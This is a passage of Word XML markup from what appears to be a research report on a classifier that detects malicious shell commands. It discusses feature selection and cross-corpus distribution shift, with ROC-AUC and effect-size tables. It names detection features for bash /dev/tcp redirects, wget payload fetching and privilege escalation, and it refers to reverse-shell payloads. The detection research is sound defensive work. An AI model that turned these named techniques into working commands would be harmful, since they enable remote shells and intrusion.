        <w:t xml:space="preserve"> &lt; 0.01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (|Cliff's δ| ≥ 0.10 for continuous features, or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>odds ratio ≥ 1.5 / ≤ 0.667 for binary ones), followed by a Spearman |ρ| &gt; 0.90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>redundancy cull that keeps one representative per correlated cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Survival requires passing on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>at least one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> corpus, not both, and the resulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>split is itself a result worth stating plainly. Of the 43 features kept, **22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>clear the gate on both datasets, 16 on Dataset 1 only, 5 on Dataset 2 only, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>none on neither**. Half the feature set is therefore corpus-specific evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That threshold was a deliberate choice against the stricter alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Requiring both corpora would have produced a 22-feature set and would have</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">deleted, among others, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the sharpest signal in the project at OR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>559 on Dataset 1. It fails on Dataset 2 not because it reverses (its odds ratio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>there is still 9.0) but because it is too rare to reach significance: it fires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on 2.95% of Dataset 1's attacks and 0.05% of Dataset 2's, since real intruders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">fetch a payload with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than opening bash's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> redirect —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correspondingly rises from 6.3% to 21.9% of the malicious class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The same rule would have deleted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_privesc</w:t>
      </w:r>
      <w:r>
        <w:t>, the only surviving encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of the sudo behaviour in Section 1.2, for the mirror-image reason: it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>significant but near-neutral on Dataset 1 (OR 0.77) and strong on Dataset 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(OR 3.70). A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rule that discards a technique because one of two corpora happens not to contain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>it is not a harmonisation rule; it is a lowest-common-denominator rule, and it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>would have hidden exactly the cross-corpus disagreement this chapter exists to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>measure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is deliberately </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> harmonised is as important. There is no per-dataset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>feature, no per-dataset threshold, no per-dataset normalisation constant and no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>per-dataset model configuration anywhere in the pipeline. Every difference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reported in Section 5.2 is therefore a property of the data, not an artefact of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>having processed the two corpora differently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.2 — Cross-Dataset Distribution Shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Because Section 5.1 established that both corpora pass through the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>stateless extractor, every difference reported here is a property of the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">rather than of the processing. Sources: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_d1_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_d2_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch4_feature_ranking.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_cross_dataset.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Three distinct kinds of shift are measurable between Dataset 1 and Dataset 2,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and they compound: the feature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>distributions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> differ, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>direction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of class</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">separation differs, and the features the models </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> differ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Covariate shift: the corpora are nearly separable in feature space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The blunt diagnostic is to discard the malicious/benign label entirely and train</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a Random Forest on the 43 engineered features alone to answer a different</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">question — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>which corpus did this command come from?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Under 5-fold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cross-validation on the pooled training splits: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rows scored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ROC-AUC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>all rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19,860</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.861</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign rows only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14,895</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.852</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>malicious rows only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4,965</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.970</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The last row is the important one. In the same 43-dimensional space in which the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>detector has to separate attacks from benign commands, a Dataset 1 attack and a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2 attack are almost perfectly distinguishable from one another. A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>published reverse-shell payload and a command typed into a compromised honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are, as feature vectors, further apart than attacks and benign commands are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>within either corpus. Nothing a model learns about the shape of one is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>guaranteed to describe the other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Effect shift I: fifteen of forty-three features change sign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Rank-biserial correlation (equivalently Cliff's δ) measures the direction and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">strength of class separation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fifteen of the 43 features invert their sign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>between the two corpora — the feature does not merely weaken, it points at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>other class. The largest reversals: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feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>swing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.247</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.171</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.418</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.207</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.342</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_quotes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.081</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.193</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
